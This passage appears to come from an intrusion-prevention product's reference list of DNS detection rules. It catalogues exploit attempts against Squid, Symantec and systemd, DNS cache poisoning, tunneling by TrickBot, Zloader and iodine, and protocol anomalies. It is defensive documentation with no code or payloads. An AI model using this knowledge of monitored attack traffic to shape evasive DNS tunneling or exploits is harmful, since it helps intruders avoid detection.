Tags: Any Operating System, Any Hardware, Spotify, Any Operating System not specific, Peer to Peer
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-219-3038
Vulnerability: Spotify-Usage
Description:
Back to top

DNS-UDP_Squid-DNS-Lookup-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid Web Proxy Cache detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2005, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Vulnerability: Squid-DNS-Lookup-Denial-Of-Service
Description:
Back to top

DNS-UDP_Squid-DNS-Replies-Invalid-Free

About this situation: A Squid DNS Replies Invalid Free vulnerability
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2011, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Squid-DNS-Replies-Invalid-Free
Description:
Back to top

DNS-UDP_Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability

About this situation: An attempt to exploit a Squid Proxy Unspecified DNS Spoofing Vulnerability vulnerability.
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2005, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1150-5242
Vulnerability: Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability
Description:
Back to top

DNS-UDP_SS-Cross-Site-Script-Encoder

About this situation: Generic XSS Encoder detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-788-5211
Last changed: sgpkg-ips-788-5211
Vulnerability: Cross-Site-Script-Encoder
Description:
Back to top

DNS-UDP_Standard-Query-Reply-Type-A

About this situation: A DNS Standard Query Reply with type A detected
Context: DNS UDP Server Message
Severity: 1
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Protocol Information
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Reply-Type-CNAME

About this situation: A DNS Standard Query Reply with type CNAME detected
Context: DNS UDP Server Message
Severity: 1
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Protocol Information
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Reply-Type-KEY

About this situation: A DNS Standard Query Reply with type KEY detected
Context: DNS UDP Server Message
Severity: 1
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Protocol Information
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Reply-Type-MX

About this situation: A DNS Standard Query Reply with type MX detected
Context: DNS UDP Server Message
Severity: 1
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Protocol Information
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Reply-Type-Null

About this situation: A DNS Standard Query Reply with type NULL detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, iodine, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Reply-Type-SRV

About this situation: A DNS Standard Query Reply with type SRV detected
Context: DNS UDP Server Message
Severity: 1
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Protocol Information
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Reply-Type-TXT

About this situation: A DNS Standard Query Reply with type TXT detected
Context: DNS UDP Server Message
Severity: 1
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Protocol Information
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1071-5242
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-A

About this situation: A DNS Standard Query Request with type A detected
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-AAAA

About this situation: A DNS Standard Query Request with type A detected
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1053-5242
Last changed: sgpkg-ips-1053-5242
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-Any

About this situation: A DNS Standard Query Request with type ANY detected
Context: DNS UDP Client Message
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1774-5242
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-CNAME

About this situation: A DNS Standard Query Request with type CNAME detected
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-KEY

About this situation: A DNS Standard Query Request with type KEY detected
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1774-5242
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-MX

About this situation: A DNS Standard Query Request with type MX detected
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-Null

About this situation: A DNS Standard Query Request with type NULL detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, iodine, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-SRV

About this situation: A DNS Standard Query Request with type SRV detected
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-TXT

About this situation: A DNS Standard Query Request with type TXT detected
Context: DNS UDP Client Message
Severity: 1
Tags: Any Operating System, Any Hardware, DNS client, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Standard-Query-Request-Type-WKS

About this situation: A DNS Standard Query Request with type WKS detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-687-5211
Description:
Back to top

DNS-UDP_Sun-Java-JRE-DNS-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java Runtime Environment detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, BEA WebLogic, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Sun-Java-JRE_DNS-Denial-Of-Service
Description:
Back to top

DNS-UDP_Suspicious-Address-Resolve

About this situation: DNS query reply with a suspicious address resolve detected
Context: DNS UDP Server Message
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1188-5242
Description:
Back to top

DNS-UDP_Suspicious-Content

About this situation: Detected suspicious content
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-868-5242
Last changed: sgpkg-ips-868-5242
Description:
Back to top

DNS-UDP_Suspicious-Long-Domain-Name-With-Mixed-Letters-And-Digits

About this situation: A DNS request containing a long domain name with mixed letters and digits detected
Context: DNS UDP Client Message
Severity: 2
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Disclosure
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: Long-Domain-Name-With-Mixed-Letters-And-Digits
Description:
Back to top

DNS-UDP_Suspicious-Query

About this situation: A suspicious DNS query detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

DNS-UDP_Suspicious-Response

About this situation: A suspicious DNS response detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-498-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

DNS-UDP_Suspicious-RRSIG

About this situation: Possible DNS denial of service
Context: DNS UDP Client Message
Severity: 2
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Potential Denial of Service
First detected in: sgpkg-ips-431-4219
Last changed: sgpkg-ips-431-4219
Description:
Back to top

DNS-UDP_Suspiciously-Long-TXT-Reply-Content

About this situation: An unusually long TXT type reply message detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1071-5242
Description:
Back to top

DNS-UDP_Symantec-DNS-Compression-DoS

About this situation: An attempt to exploit a vulnerability in multiple Symantec products detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Norton AntiSpam, Symantec Norton Personal Firewall, Symantec Norton Internet Security, Symantec Client Security, Symantec Client Firewall, CVE2004, Any Operating System not specific, Suspected Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Symantec-DNS-Compression-DoS
Description:
Back to top

DNS-UDP_Symantec-Gateway-Products-DNS-Cache-Poisoning

About this situation: An attempt to exploit a vulnerability in Symantec Gateway Security detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Gateway Security, Symantec Enterprise Firewall, Symantec VelociRaptor, CVE2005, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-604-5211
Vulnerability: Symantec-Gateway-Products-DNS-Cache-Poisoning
Description:
Back to top

DNS-UDP_Symantec-Gateway-Products-DNSD-DNS-Cache-Spoof

About this situation: DNS cache poisoning vulnerability in Symantec Gateway products
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Gateway Security, Symantec Enterprise Firewall, CVE2004, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1008-5242
Vulnerability: Symantec-Gateway-Products-DNSD-DNS-Cache-Spoof
Description:
Back to top

DNS-UDP_Systemd-Resolved-DNS_Packet_Read_Type_Window-Infinite-Loop

About this situation: An attempt to exploit a vulnerability in Systemd Systemd detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, Systemd, CVE2017, Any Operating System not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1023-5242
Last changed: sgpkg-ips-1870-5242
Vulnerability: Systemd-Resolved-DNS_Packet_Read_Type_Window-Infinite-Loop
Description:
Back to top

DNS-UDP_TippingPoint-Ips-Reverse-DNS-Lookup-Format-String

About this situation: An attempt to exploit a vulnerability in TippingPoint IPS detected
Context: DNS UDP Server Message
Severity: 7
Tags: Any Operating System, Any Hardware, TippingPoint IPS, Any Operating System not specific, Potential Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1351-5242
Last changed: sgpkg-ips-1351-5242
Vulnerability: TippingPoint-Ips-Reverse-DNS-Lookup-Format-String
Description:
Back to top

DNS-UDP_TrickBot-AnchorDNS-Client-Tunnel-Message

About this situation: TrickBot AnchorDNS client tunneling message detected
Context: DNS UDP Client Message
Severity: 7
Tags: Windows, Linux, Any Hardware, Windows not specific, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1294-5242
Vulnerability: TrickBot-C2-Traffic
Description:
Back to top

DNS-UDP_TrickBot-AnchorDNS-Server-Tunnel-Message

About this situation: TrickBot AnchorDNS server tunneling message detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows, Linux, Any Hardware, Windows not specific, Linux not specific, Suspected Compromise, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1294-5242
Vulnerability: TrickBot-C2-Traffic
Description:
Back to top

DNS-UDP_Txt-Query-Reply-255-Length

About this situation: DNS TXT type query reply with 255 bytes of data length detected
Context: DNS UDP Server Message
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1400-5242
Description:
Back to top

DNS-UDP_Uncommon-Address-Resolved

About this situation: DNS query reply with a uncommon address resolve detected
Context: DNS UDP Server Message
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1188-5242
Description:
Back to top

DNS-UDP_Worm-Autorun-Aaeb-H-Request

About this situation: W32/Autorun.worm.aaeb-h request detected
Context: DNS UDP Client Message
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Worm-Autorun-Aaeb-H
Description:
Back to top

DNS-UDP_Worm-Autorun-Aaeb-H-Response-Detected

About this situation: W32/Autorun.worm.aaeb-h response detected
Context: DNS UDP Server Message
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Worm-Autorun-Aaeb-H
Description:
Back to top

DNS-UDP_Your-Freedom-Network-Query

About this situation: Detected an attempt to request Your Freedom network address
Context: DNS UDP Client Message
Severity: 2
Tags: Any Operating System, Any Hardware, Your Freedom, Any Operating System not specific, Tunneling Protocols
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-853-5242
Vulnerability: Your-Freedom-Network-Usage
Description:
Back to top

DNS-UDP_Zlip-Compression-Pointer-DoS-1

About this situation: Possible DNS denial of service
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Zlip-DNS-Violations
Description:
Back to top

DNS-UDP_Zlip-Compression-Pointer-DoS-2

About this situation: Possible DNS denial of service
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Zlip-DNS-Violations
Description:
Back to top

DNS-UDP_Zlip-Compression-Pointer-DoS-3

About this situation: Possible DNS denial of service
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Generic DNS server, Any Operating System not specific, Generic DNS server not specific, Denial of Service, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: Zlip-DNS-Violations
Description:
Back to top

DNS-UDP_Zloader-Malware-DNS-Tunneling

About this situation: Zloader malware activity detected
Context: DNS UDP Client Message
Severity: 7
Tags: Any Operating System, Any Hardware, Zloader, Any Operating System not specific, Suspected Botnet, UDP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1846-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Zloader-Malware-C2-Traffic
Description:
Back to top

DNSCurve

About this situation: DNSCurve traffic
Context: Application Context
Severity: 1
Tags: Protocols, Tunneling
First detected in: sgpkg-ips-942-5242
Last changed: sgpkg-ips-1514-5242
Description: DNSCurve is a secure protocol for DNS which uses Curve25519 elliptic curve cryptography.
Back to top

DNSimple

About this situation: Application DNSimple detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: DNSimple is a managed domain name server service, which offers DNS hosting, domain registration and SSL certificate.
Back to top

Dnsstuff

About this situation: DNSstuff usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: DNSstuff offers DNS tools, Network tools, Email tools, DNS reporting and IP information gathering.
Back to top

DNS_Class-Not-IN

About this situation: Class other than Internet (IN) used in DNS message
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: A class other than Internet (IN) was used in a DNS message request part. The class code may be encountered as a Resource Record class or a query class. The message causing this event is a DNS request. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. The potential risk is information disclosure. An attacker may obtain valuable information on the target, for example, by using the CHAOS class. The disclosed information could be used for further attacks.
Back to top

DNS_Class-Not-IN-Reply-Failure

About this situation: Class other than Internet (IN) used in request part of DNS failure response
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: A class other than Internet (IN) was used in the request part of a DNS message. The class code may be encountered as a Resource Record class or a query class. The message causing this event is a DNS failure response. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. The potential risk is information disclosure. An attacker may obtain valuable information on the target, for example, by using the CHAOS class. The disclosed information could be used for further attacks.
Back to top

DNS_Class-Not-IN-Reply-Success

About this situation: Class other than Internet (IN) used in DNS success response
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: A class other than Internet (IN) was used in a DNS message. The class code may be encountered as a Resource Record class or a query class. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. The potential risk is information disclosure. An attacker may obtain valuable information on the target, for example, by using the CHAOS class. The disclosed information could be used for further attacks. This situation involves a success response from the server, indicating that the information gathering may have been successful.
Back to top

DNS_Client-Class-Query-Only

About this situation: DNS message with QUERY or IQUERY Opcode contained query-only class value ANY in Answer section Resource Record
Context: DNS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: DNS message with the QUERY or IQUERY Opcode contained a query-only class value ANY in an Answer section Resource Record. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: Low
Back to top

DNS_Client-Class-Unknown

About this situation: Unknown class field value detected in DNS message's Question or Answer section
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown class field value was detected in a DNS message's Question or Answer section. The unknown value is either reserved or not specified in the RFCs. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This situation may result from non-DNS protocol data.
Back to top

DNS_Client-Header-Z-Nonzero

About this situation: Reserved Z field in DNS message header was non-zero
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The reserved Z field in the DNS message header was non-zero. According to the standard, the Z field must be zero. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. The datagram may contain something other than DNS protocol data.
Back to top

DNS_Client-Hostname-Length

About this situation: The DNS name field that was inspected as a hostname exceeded the hostname length limit specified.
Context: DNS Client Hostname Over Limit
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS name field that was inspected as a hostname exceeded the hostname length limit specified. Hostnames are in the name field of A and MX records and in the data fields of SOA and NS records. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: Risk level is low. This does not violate the DNS protocol. This violates the defined limit in the policy. Long host names may be a buffer overflow attack against some defective DNS protocol implementations.
Back to top

DNS_Client-Hostname-Syntax-Incorrect

About this situation: DNS name inspected as host name did not conform to host name syntax specified by [RFC 952]
Context: DNS without parameters
Severity: 1
Tags: Obsolete
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS name inspected as a host name did not conform to the host name syntax specified by [RFC 952]. Host names are in the name field of A and MX records and in the data fields of SOA and NS records. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. The situation is considered abnormal and may possibly be related to some kind of attack.
Back to top

DNS_Client-Name-Bad-Label-Type

About this situation: Unknown DNS name label type encountered in DNS message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown DNS name label type was encountered in a DNS message. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS name syntax specified by the DNS protocol. The datagram may contain something other than DNS protocol data. Alternatively, this may represent some kind of attack against a defective DNS protocol implementation.
Back to top

DNS_Client-Name-Bad-Pointer-Version-2

About this situation: Invalid name compression pointer value encountered in DNS name
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-265-3038
Last changed: sgpkg-ips-265-3038
Description: Invalid name compression pointer value encountered in a DNS name. The pointer was referring to a location containing no name label or pointer, or the pointer was referring illegally to an offset greater than the pointer itself. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This may represent some kind of attack against a defective DNS protocol implementation.
Back to top

DNS_Client-Name-Length

About this situation: The DNS name field exceeded 100 bytes.
Context: DNS Client Name Over Limit
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS name field exceeded the length limit specified in the policy. The "DNS name length" log field shows the detected value. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. This violates the defined limit in the policy. Long names may be a buffer overflow attack against some defective DNS protocol implementations.
Back to top

DNS_Client-Name-Syntax-Incorrect

About this situation: DNS name violates printable-ASCII syntax
Context: DNS without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The DNS name violates the printable-ASCII syntax. If this name is a host name, the host name syntax is also violated. (There is no separate notification of violation of the host name syntax when this situation occurs.) This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This does not violate the DNS protocol. The situation is considered abnormal for this environment and may possibly be related to some kind of attack.
Back to top

DNS_Client-Name-Too-Long

About this situation: Total length of DNS name with all pointer and length fields was greater than 255
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: The total length of a DNS name with all the pointer and the length fields was greater than 255. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This may be a buffer overflow attack against some defective DNS protocol implementations.
Back to top

DNS_Client-Opcode-Unknown

About this situation: Unknown Opcode value detected in DNS message's header
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown Opcode value was detected in a DNS message's header. The unknown value is either reserved or not specified in the RFCs. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This situation may result from non-DNS protocol data.
Back to top

DNS_Client-Premature-End

About this situation: DNS message ended prematurely as transport layer datagram or stream ended
Context: DNS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-240-3038
Description: The DNS message ended prematurely as the transport layer datagram or stream ended. This may also occur when the DNS message was completely missing. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This situation may result from non-DNS protocol data.
Back to top

DNS_Client-QDCOUNT-Not-1

About this situation: DNS message with QUERY Opcode contained QDCOUNT field value that was not 1
Context: DNS without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: A DNS message with the QUERY Opcode contained a QDCOUNT field value that was not 1. The event is not generated in normal operation where QDCOUNT is zero and RCODE is non-zero. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: Usually, DNS QUERY messages contain one question. Sometimes (e.g. in case of error or zone transfer) the response message does not contain questions at all. This situation may result from non-DNS protocol data. It may indicate some kind of attempted buffer overflow attack.
Back to top

DNS_Client-Question-Logged

About this situation: A DNS client question record was logged.
Context: DNS without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Description: A DNS client's question record was logged. Risk analysis: Risk level is none. This is an informative message.
Back to top

DNS_Client-RCODE-Unknown

About this situation: DNS unknown RCODE value seen
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown return code value was detected in a DNS message's header. The unknown value is either reserved or not specified in the RFCs. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This situation may result from non-DNS protocol data.
Back to top

DNS_Client-Resource-Record-Extra-Data

About this situation: Resource Record contents shorter than indicated in RDLEN field
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The Resource Record contents were shorter than indicated in the RDLEN field. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol.
Back to top

DNS_Client-Resource-Record-Over-Length

About this situation: Resource Record contents longer than indicated in RDLEN field
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The Resource Record contents were longer than indicated in the RDLEN field. This situation can occur in DNS data over TCP and UDP transport. Risk analysis: This violates the DNS protocol. This could be caused by non-DNS protocol data or by some kind of attack against a defective DNS protocol implementation.
Back to top

DNS_Client-TCP-Extra-Data

About this situation: DNS message shorter than indicated in TCP LENGTH prefix field of message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS message was shorter than indicated in the TCP LENGTH prefix field of the message. This situation can occur in DNS data over TCP transport. Risk analysis: This violates the DNS protocol. The extra data may potentially contain some attack-related data, such as shellcode.
Back to top

DNS_Client-TCP-Over-Length

About this situation: DNS message longer than indicated in TCP LENGTH prefix field of message
Context: DNS without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The DNS message was longer than indicated in the TCP LENGTH prefix field of the message. This situation can occur in DNS data over TCP transport. Risk analysis: This violates the DNS protocol.
Back to top

DNS_Client-TCP-QR-Wrong-Direction

About this situation: DNS message sent in wrong direction: DNS response seen in TCP client stream
Context: DNS without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-241-3038
